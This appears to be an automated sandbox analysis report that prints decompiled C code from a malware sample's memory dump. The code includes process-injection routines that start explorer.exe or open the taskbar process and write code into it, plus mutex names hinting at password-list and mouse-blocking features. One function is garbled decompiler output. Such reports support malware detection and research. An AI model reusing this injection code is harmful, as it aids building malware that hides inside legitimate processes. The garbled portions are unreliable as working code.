                                    				struct _STARTUPINFOA _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				intOrPtr _t58;
                                    				intOrPtr* _t60;
                                    				intOrPtr* _t61;
                                    				char* _t62;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t91;
                                    				intOrPtr* _t99;
                                    				void* _t104;
                                    				intOrPtr* _t113;
                                    				intOrPtr* _t119;
                                    				intOrPtr* _t124;
                                    				intOrPtr _t129;
                                    				intOrPtr* _t137;
                                    				void* _t142;
                                    				intOrPtr* _t151;
                                    				intOrPtr _t159;
                                    				char* _t161;
                                    				struct HWND__* _t163;
                                    				void* _t168;
                                    				intOrPtr _t197;
                                    				intOrPtr _t201;
                                    				intOrPtr _t210;
                                    				intOrPtr _t221;
                                    				void* _t236;
                                    				void* _t239;
                                    				void* _t241;
                                    
                                    				_t234 = __edi;
                                    				_t194 = __ecx;
                                    				_t185 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v116 = 0;
                                    				_v112 = 0;
                                    				_v108 = 0;
                                    				_v104 = 0;
                                    				_v100 = 0;
                                    				_push(_t239);
                                    				_push(0x40b7a8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t239 + 0xffffff90;
                                    				_t58 =  *0x40d1cc; // 0x40e924
                                    				_t236 = E00401F9C(_t58);
                                    				_t60 =  *0x40d210; // 0x40e8ec
                                    				_t241 =  *_t60 - 2;
                                    				if(_t241 != 0) {
                                    					_t61 =  *0x40d210; // 0x40e8ec
                                    					__eflags =  *_t61 - 1;
                                    					if(__eflags != 0) {
                                    						_t62 =  *0x40d1b8; // 0x40e8fc
                                    						__eflags =  *_t62 - 1;
                                    						if( *_t62 == 1) {
                                    							__eflags = 0;
                                    							E004013A4(0,  &_v116);
                                    							E00401E94( *0x40f1e8, _v116);
                                    							if(__eflags != 0) {
                                    								_t194 = E00401F48( *0x40f1e8);
                                    								__eflags = 0;
                                    								E00405AD8(0, _t85, "open", 0, 0x40b7f0, 0x40b7f0);
                                    								E0040AFB0(__ebx, _t85, _t236, 0);
                                    								ExitProcess(0);
                                    							}
                                    						}
                                    						_t197 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = 0;
                                    						E004013A4(0, _t197);
                                    						E00403738();
                                    						E00403738();
                                    						_t71 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t71), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						E00406294( &_v112, __ebx, __edi, _t236, __eflags);
                                    						_t91 =  *0x40d21c; // 0x40e8f0
                                    						E00401B14(_t91, _v112);
                                    						E00403738();
                                    						E00403738();
                                    						_t99 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t99), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t104 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						__eflags = _t104;
                                    						if(_t104 == 0) {
                                    							_t210 =  *0x40d21c; // 0x40e8f0
                                    							E004013A4(0, _t210);
                                    							E00403738();
                                    							E00403738();
                                    							_t113 =  *0x40d21c; // 0x40e8f0
                                    							CreateProcessA(E00401F48( *_t113), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    				} else {
                                    					_t119 =  *0x40d21c; // 0x40e8f0
                                    					E004047C4( *_t119, __ebx,  &_v100, __edi, _t236, _t241);
                                    					E00401E94(_v100, "explorer.exe");
                                    					if(_t241 != 0) {
                                    						_t124 =  *0x40d21c; // 0x40e8f0
                                    						__eflags = E004064DC( *_t124, __ebx,  &_v12, __edi, _t236, __eflags) - 1;
                                    						if(__eflags != 0) {
                                    							E00406294( &_v108, _t185, __edi, _t236, __eflags);
                                    							_t129 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t129, _v108);
                                    						} else {
                                    							E004063FC(_v12,  &_v104);
                                    							_t159 =  *0x40d21c; // 0x40e8f0
                                    							E00401B14(_t159, _v104);
                                    						}
                                    						E00403738();
                                    						E00403738();
                                    						_t137 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t137), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					} else {
                                    						_t161 =  *0x40d214; // 0x40e8f4
                                    						if( *_t161 != 1) {
                                    							_t163 = FindWindowA("shell_traywnd", 0); // executed
                                    							GetWindowThreadProcessId(_t163,  &_v8);
                                    							_t168 = E004040F4(OpenProcess(0x1f0fff, 0, _v8), _t166, _t194, _t236, __edi, _t236); // executed
                                    							__eflags = _t168;
                                    							if(_t168 != 0) {
                                    								_t142 = 1;
                                    							} else {
                                    								E00403738();
                                    								E00403738();
                                    								CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28); // executed
                                    								_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236); // executed
                                    							}
                                    						} else {
                                    							E00403738();
                                    							E00403738();
                                    							CreateProcessA(0, "explorer.exe", 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    							_t142 = E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, __edi, _t236);
                                    						}
                                    					}
                                    					if(_t142 == 0) {
                                    						_t221 =  *0x40d21c; // 0x40e8f0
                                    						E004013A4(0, _t221);
                                    						E00403738();
                                    						E00403738();
                                    						_t151 =  *0x40d21c; // 0x40e8f0
                                    						CreateProcessA(E00401F48( *_t151), 0x40b7f0, 0, 0, 0, 4, 0, 0,  &_v96,  &_v28);
                                    						E004040F4(_v28.hProcess, _v28.hProcess, _t194, _t236, _t234, _t236);
                                    					}
                                    				}
                                    				_pop(_t201);
                                    				 *[fs:eax] = _t201;
                                    				_push(E0040B7AF);
                                    				return E00401AE4( &_v116, 5);
                                    			}

                                    APIs
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B462
                                      • Part of subcall function 004040F4: VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                      • Part of subcall function 004040F4: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                      • Part of subcall function 004040F4: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                      • Part of subcall function 004040F4: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    • FindWindowA.USER32(shell_traywnd,00000000), ref: 0040B483
                                    • GetWindowThreadProcessId.USER32(00000000,shell_traywnd), ref: 0040B489
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,shell_traywnd,00000000,?,00000000,0040B7A8), ref: 0040B499
                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000004,00000000,00000000,?,?,001F0FFF,00000000,?,00000000,shell_traywnd,00000000), ref: 0040B4E2
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B581
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B5E7
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B660
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7F0,00000000,00000000,00000000,00000004), ref: 0040B6C6
                                      • Part of subcall function 004047C4: CharLowerA.USER32(?,00000000,00404839), ref: 00404802
                                    • ExitProcess.KERNEL32(00000000,00000000,0040B7A8), ref: 0040B72A
                                    • CreateProcessA.KERNEL32(00000000,0040B7F0,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,0040B7A8), ref: 0040B77C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Process$Create$Virtual$AllocWindow$CharExitFindFreeLowerMemoryOpenThreadWrite
                                    • String ID: $@$explorer.exe$explorer.exe$open$shell_traywnd$@
                                    • API String ID: 3531647898-832551239
                                    • Opcode ID: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction ID: 1ef0f6496c909ed0c3779ef052ced8ab034a7c85da5a6e5c6a5d2eb73cd655db
                                    • Opcode Fuzzy Hash: c0ff7826fd6f996ef2014f0fe298170b6956a469b3a74fdcb78f6debc0ee12c8
                                    • Instruction Fuzzy Hash: 79B114B4B402086BD710EBE5CC42F9E77A9EB48704F50847BB600BB2D5D778E906979D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E004040F4(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v13;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				long _v28;
                                    				intOrPtr _v36;
                                    				long _v44;
                                    				void* _v48;
                                    				void* _t38;
                                    				void* _t42;
                                    				void* _t49;
                                    				void* _t55;
                                    				void* _t57;
                                    				intOrPtr _t64;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t74;
                                    				void* _t76;
                                    				void* _t79;
                                    				intOrPtr* _t80;
                                    
                                    				_t80 = _t79 + 0xffffffd4;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t64 =  *0x4037bc; // 0x4037c0
                                    				E0040242C( &_v48, _t64);
                                    				_push(_t79);
                                    				_push(0x404205);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t80;
                                    				_v13 = 0;
                                    				_push(0);
                                    				_push(_v12);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
                                    				_t76 = 0x10000000;
                                    				do {
                                    					_t76 = _t76 + 0x10000;
                                    					_t38 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    					_t57 = _t38;
                                    					if(_t57 != 0) {
                                    						VirtualFree(_t57, 0, 0x8000); // executed
                                    						_t55 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40); // executed
                                    						_t57 = _t55;
                                    					}
                                    				} while (_t57 == 0 && _t76 <= 0x30000000);
                                    				E00403EC0(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48); // executed
                                    				_t42 = _v48;
                                    				if(_t42 != 0) {
                                    					_v24 = _t42;
                                    					_v20 = _v36;
                                    					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28); // executed
                                    					_t49 = E004038AC(_v8,  &_v24, E004040CC, 0, 8); // executed
                                    					if(_t49 != 0) {
                                    						_v13 = 1;
                                    					}
                                    				}
                                    				_pop(_t67);
                                    				 *[fs:eax] = _t67;
                                    				_push(E0040420C);
                                    				_t68 =  *0x4037bc; // 0x4037c0
                                    				return E004024F0( &_v48, _t68);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00404159
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 0040416C
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 00404186
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 004041C8
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction ID: f42078a2441a78766933d26432ea83b222ae1456efaef136c5ff68d4265ad9e9
                                    • Opcode Fuzzy Hash: 84d083e9ede9dc6036b816ade957f8df94457944a9d7dd1853b489bbe3e0cb9a
                                    • Instruction Fuzzy Hash: 4C3112B1A00205ABD710DB99CD85F9EB7FDAB88704F54847AF604F7381D674EE048BA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00403789(void* __eax, void* __ebx, signed int __ecx, signed char __edx, signed char* __edi, void* __esi) {
                                    				signed char _t26;
                                    				void* _t32;
                                    				intOrPtr* _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr* _t46;
                                    				signed int _t49;
                                    				signed char _t55;
                                    				intOrPtr _t58;
                                    				void* _t60;
                                    				signed char* _t61;
                                    				void* _t65;
                                    				signed int _t66;
                                    				intOrPtr _t67;
                                    
                                    				_t61 = __edi;
                                    				_t55 = __edx;
                                    				_t49 = __ecx;
                                    				_t48 = __ebx;
                                    				asm("aaa");
                                    				 *__ecx =  *__ecx + __edx;
                                    				_t26 = __eax + 0x00000001 | 0x00000054;
                                    				_push(__ebx);
                                    				if(_t26 == 0) {
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t67;
                                    					E00401CAC(_t65 - 8, __ebx);
                                    					_t32 = VirtualAllocEx(__esi, 0, E00401D50( *((intOrPtr*)(_t65 - 8))) + 1, 0x3000, 0x40); // executed
                                    					E00401CAC(_t65 - 0xc, __ebx);
                                    					WriteProcessMemory(__esi, _t32, __ebx, E00401D50( *((intOrPtr*)(_t65 - 0xc))) + 1, _t65 - 4); // executed
                                    					_pop(_t58);
                                    					 *[fs:eax] = _t58;
                                    					_push(E00403871);
                                    					return E00401AE4(_t65 - 0xc, 2);
                                    				} else {
                                    					_t66 =  *(__esi + 0x67) * 0x61727241;
                                    					if(_t66 < 0) {
                                    						 *_t26 =  *_t26 + _t26;
                                    						 *((intOrPtr*)(_t26 + __edx)) =  *((intOrPtr*)(_t26 + __edx)) + __edx;
                                    					}
                                    					asm("adc [eax], al");
                                    					_t43 = _t26 - 1;
                                    					 *_t43 =  *_t43 + _t43;
                                    					 *((intOrPtr*)(_t43 + _t55)) =  *((intOrPtr*)(_t43 + _t55)) + _t55;
                                    					 *_t49 =  *_t49 + _t55;
                                    					_push(_t66);
                                    					asm("outsb");
                                    					asm("aaa");
                                    					_t45 = _t43 + 2;
                                    					 *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) =  *( *(_t49 + 0x6e + _t49 * 2) * 0x7463656a) + _t49;
                                    					 *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) =  *( *(_t55 + 0x72) * 0xc0797261 + 0x69 + _t49 * 2) | _t55;
                                    					asm("bound ecx, [ecx+0x6e]");
                                    					asm("outsw");
                                    					asm("adc al, 0x0");
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t45 =  *_t45 + _t45;
                                    					 *_t61 = _t55;
                                    					_t46 = _t45 + 1;
                                    					 *_t46 =  *_t46 + _t55;
                                    					 *_t46 =  *_t46 + _t46;
                                    					 *((intOrPtr*)(_t48 + 0x42d233c0)) =  *((intOrPtr*)(_t48 + 0x42d233c0)) + _t49;
                                    					_t60 = 0;
                                    					do {
                                    						_t60 = _t60 + 1;
                                    					} while ( *((char*)(_t46 + _t60 - 1)) != 0xc3);
                                    					return _t60;
                                    				}
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction ID: 0c617441959cbc84cdace3d6f91086d90079d183bae557b442fb7b10ecf1da84
                                    • Opcode Fuzzy Hash: f0bdd6dffcd38e97630dd65025443de6d4de875a0db27301e0117961d2cab211
                                    • Instruction Fuzzy Hash: 2921D23050E3C11FD7039B7088529997FA8EB47314B5940FBE081AB1E3C67C9A06C72A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 41%
                                    			E004037EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				void* _t14;
                                    				void* _t26;
                                    				intOrPtr _t33;
                                    				void* _t38;
                                    				intOrPtr _t41;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t26 = __edx;
                                    				_t38 = __eax;
                                    				_push(_t41);
                                    				_push(0x40386a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t41;
                                    				E00401CAC( &_v12, __edx);
                                    				_t14 = VirtualAllocEx(_t38, 0, E00401D50(_v12) + 1, 0x3000, 0x40); // executed
                                    				E00401CAC( &_v16, _t26);
                                    				WriteProcessMemory(_t38, _t14, _t26, E00401D50(_v16) + 1,  &_v8); // executed
                                    				_pop(_t33);
                                    				 *[fs:eax] = _t33;
                                    				_push(E00403871);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction ID: 1ce7357d57a470de8e11aa6f3e94a258910408ab5c4fbe8ac5f974eefb294d6d
                                    • Opcode Fuzzy Hash: 3d11060167eeff0d333754bde7cf52b815637146b18d6ef34f71e39cc8c7fece
                                    • Instruction Fuzzy Hash: 0901A7356402047FE711AA628C42FAFBBACDB45744F614477F901F22D2D97CAE01856C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E00405D04(char __eax, void* __ebx, void* __eflags) {
                                    				char _v8;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t13;
                                    				intOrPtr _t23;
                                    				void* _t26;
                                    
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t26);
                                    				_push(0x405d61);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t26 + 0xfffffebc;
                                    				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
                                    				if(_t13 != 0xffffffff) {
                                    					FindClose(_t13);
                                    				}
                                    				_pop(_t23);
                                    				 *[fs:eax] = _t23;
                                    				_push(E00405D68);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
                                    				void* _t2;
                                    				void* _t5;
                                    				void* _t9;
                                    				long _t10;
                                    				void* _t11;
                                    				SIZE_T* _t12;
                                    
                                    				_push(__ecx);
                                    				_t10 = __ecx;
                                    				_t11 = __edx;
                                    				_t5 = __eax;
                                    				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
                                    				_t9 = _t2;
                                    				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
                                    				return _t9;
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				void* _t49;
                                    				void* _t52;
                                    				long _t53;
                                    				void* _t55;
                                    				intOrPtr* _t65;
                                    				void* _t68;
                                    				long _t69;
                                    				char* _t80;
                                    				intOrPtr* _t93;
                                    				long _t97;
                                    				intOrPtr* _t100;
                                    				long _t104;
                                    				intOrPtr* _t107;
                                    				long _t111;
                                    				struct HINSTANCE__* _t114;
                                    				struct HINSTANCE__* _t117;
                                    				void* _t120;
                                    				void* _t209;
                                    				void* _t210;
                                    				void* _t211;
                                    				void* _t212;
                                    				void* _t213;
                                    				void* _t216;
                                    				void* _t217;
                                    				void* _t218;
                                    				void* _t219;
                                    				void* _t220;
                                    				void* _t221;
                                    				void* _t222;
                                    				intOrPtr _t229;
                                    				void* _t254;
                                    				void* _t255;
                                    				intOrPtr _t257;
                                    				intOrPtr _t258;
                                    				void* _t270;
                                    
                                    				_t255 = __esi;
                                    				_t254 = __edi;
                                    				_t257 = _t258;
                                    				_t213 = 0xb;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t213 = _t213 - 1;
                                    				} while (_t213 != 0);
                                    				E00403418(0x40bb04);
                                    				_push(_t257);
                                    				_push(0x40c0c4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t258;
                                    				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
                                    				_t209 = _t49;
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t209); // executed
                                    				} else {
                                    					CloseHandle(_t209);
                                    					Sleep(0x2ee0);
                                    				}
                                    				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    				_t210 = _t52;
                                    				_t53 = GetLastError();
                                    				_t261 = _t53 - 0xb7;
                                    				if(_t53 != 0xb7) {
                                    					CloseHandle(_t210);
                                    					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    					_t211 = _t55;
                                    					__eflags = GetLastError() - 0xb7;
                                    					if(__eflags != 0) {
                                    						CloseHandle(_t211);
                                    						L26:
                                    						E004013A4(1,  &_v80);
                                    						_t225 = "Restart";
                                    						E00401E94(_v80, "Restart");
                                    						if(__eflags != 0) {
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E00404604(_t213, __eflags);
                                    						E0040491C();
                                    						E0040B118(_t225, _t254, _t255);
                                    						_t65 =  *0x40d204; // 0x40e8f8
                                    						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
                                    						_t212 = _t68;
                                    						_t69 = GetLastError();
                                    						__eflags = _t69 - 0xb7;
                                    						if(_t69 != 0xb7) {
                                    							CloseHandle(_t212); // executed
                                    						} else {
                                    							CloseHandle(_t212);
                                    							Sleep(0x3e8);
                                    							_t93 =  *0x40d204; // 0x40e8f8
                                    							_t212 = E00403568(0, 0, E00401F48( *_t93));
                                    							_t97 = GetLastError();
                                    							__eflags = _t97 - 0xb7;
                                    							if(_t97 != 0xb7) {
                                    								CloseHandle(_t212);
                                    							} else {
                                    								CloseHandle(_t212);
                                    								Sleep(0x3e8);
                                    								_t100 =  *0x40d204; // 0x40e8f8
                                    								_t212 = E00403568(0, 0, E00401F48( *_t100));
                                    								_t104 = GetLastError();
                                    								__eflags = _t104 - 0xb7;
                                    								if(_t104 != 0xb7) {
                                    									CloseHandle(_t212);
                                    								} else {
                                    									CloseHandle(_t212);
                                    									Sleep(0x3e8);
                                    									_t107 =  *0x40d204; // 0x40e8f8
                                    									_t212 = E00403568(0, 0, E00401F48( *_t107));
                                    									_t111 = GetLastError();
                                    									__eflags = _t111 - 0xb7;
                                    									if(_t111 != 0xb7) {
                                    										CloseHandle(_t212);
                                    									} else {
                                    										ExitProcess(0);
                                    									}
                                    								}
                                    							}
                                    						}
                                    						__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    						if( *((char*)( *0x40d1dc)) != 1) {
                                    							__eflags = 0;
                                    							E004013A4(0, 0x40f1e8);
                                    						} else {
                                    							E004013A4(0,  &_v88);
                                    							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
                                    							E00401B14(0x40f1e8, _v84);
                                    						}
